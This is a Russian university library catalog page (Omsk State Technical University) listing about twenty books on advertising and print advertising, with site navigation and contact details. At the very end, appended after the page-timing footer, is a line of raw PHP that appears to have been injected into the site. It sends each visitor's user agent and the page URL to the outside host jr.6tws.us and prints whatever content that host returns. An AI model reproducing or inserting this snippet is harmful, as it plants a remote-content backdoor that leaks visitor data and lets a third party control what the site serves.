Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

109 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Печатная реклама")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 26
1. 
Картер, Гарри. Эффективная реклама [Текст] : Путеводитель для мелких предприятий / Г. Картер; Пер. с англ. В. Б. Боброва; Общ. ред. Е. М. Пеньковой, 1991. - 279, [1] с.
Держатели документа (Информация об экземплярах) 
2. 
Стефанов, Стефан Иванович. Полиграфия для рекламистов и не только [Текст] : Рук. к действию: Учеб. пособие по специальности 350700 "Реклама" / С. И. Стефанов, 2002. - 343 с.
Держатели документа (Информация об экземплярах) 
3. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 2001. - 351, [1] с.
4. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2002. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
5. 
Джулер, А. Джером. Креативные стратегии в рекламе [Текст] / А. Д. Джулер, Б. Л. Дрюниани; Пер. с англ. Т. Виноградовой, Л. Царук; Под ред. Ю. Н. Каптуревского, 2003. - 384 с.
Держатели документа (Информация об экземплярах) 
6. 
Рассел, Дж. Томас. Рекламные процедуры Клеппнера [Текст] / Д. Т. Рассел, У. Р. Лейн, 2003. - 927 с.
Держатели документа (Информация об экземплярах) 
7. 
Реклама: палитра жанров [Текст] : производственно-практическое издание / С. А. Шомова [и др.], 2000. - 100 с.
Держатели документа (Информация об экземплярах) 
8. 
Джулер, А. Джером. Креативные стратегии в рекламе [Текст] / А. Дж. Джулер, Б. Л. Дрюниани; Пер. с англ.: Т. Виноградовой, Л. Царук; Под ред. Ю. Н. Каптуревского, 2002. - 384 с.
Держатели документа (Информация об экземплярах) 

Запоминающиеся заголовки и призовые рекламные компании - это не только вспышки творческого вдохновения. В процессе чтения этой книги вы поймете, что создание сильной рекламы - это вполне постижимый процесс, который действительно может быть разбит на отдельные этапы. Книга поможет вам найти собственые творческие идеи для ведения убедительных и плодотворных <рекламных кампаний>.

9. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. пособие / Е. В. Ромат, 2003. - 168 с.
Держатели документа (Информация об экземплярах) 

В учебном пособии кратко и последовательно проведен анализ такой динамичной, быстро трансформирующейся сферы человеческой деятельности, как реклама. Подробно изучаются рекламные <коммуникации> и их основные элементы, процессы формирования <рекламного обращения> и выбор каналов его распространения, значительное внимание уделяется проблемам и перспективам рекламного <менеджмента>.

Учебник предназначен для студентов экономических вузов, изучающих маркетинг, менеджмент, паблик рилейшнз. Большок количество иллюстративного материала, примеров из отечественной и зарубежной практики делают эту книгу полезной для специалистов, работающих в рекламном бизнесе.

10. 
Мокшанцев, Рудольф Иванович. Психология рекламы [Текст] : Учеб. пособие для вузов по специальности "Менеджмент" / Р. И. Мокшанцев, 2002. - 228 [1] с.
Держатели документа (Информация об экземплярах) 
11. 
Шенерт, Вальтер. Грядущая реклама [Текст] : 199 примеров, секретов успеха, практ. рекомендаций / В. Шенерт; Пер. с нем. А. М. Чунакова, 2001. - 295, [4] с.
Держатели документа (Информация об экземплярах) 
12. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2000. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
13. 
Шенерт, Вальтер. Грядущая реклама [Текст] / В. Шенерт; А. М. Чунаков, 1999. - 300 с.
Держатели документа (Информация об экземплярах) 
14. 
Картер, Гарри. Эффективная реклама [Текст] : Путеводитель для малого бизнеса / Г. Картер; В. Б. Бобров, Е. М. Пенькова, 1998. - 244 с.
Держатели документа (Информация об экземплярах) 
15. 
Романычева, Эльза Тимофеевна. Дизайн и реклама. Компьютерные технологии [Текст] : Справ. и практ. рук. / Э. Т. Романычева, О. Г. Яцюк, 2000. - 428 с.
Держатели документа (Информация об экземплярах) 
16. 
Реклама: палитра жанров [Текст] / В. В. Ученова, С. А. Шомова, Т. Э. Гринберг, К. В. Конаныхин, 2000. - 95 с.
Держатели документа (Информация об экземплярах) 
17. 
Песоцкий, Евгений Александрович. Современная реклама [Текст] : Теория и практика / Е. Песоцкий, 2001. - 315 с.
Держатели документа (Информация об экземплярах) 
18. 
Рогожин, Михаил Юрьевич. Теория и практика рекламной деятельности [Текст] : Учеб. пособие / М. Ю. Рогожин, 2001. - 206 с.
Держатели документа (Информация об экземплярах) 
19. 
Ромат, Евгений Викторович. Реклама [Текст] : Учеб. для специальности "Маркетинг" / Е. В. Ромат, 2000. - 479 с.
Держатели документа (Информация об экземплярах) 
20. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 1999. - 352 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3102 - 07.12.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.98 с.12 запросов, 0.93c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;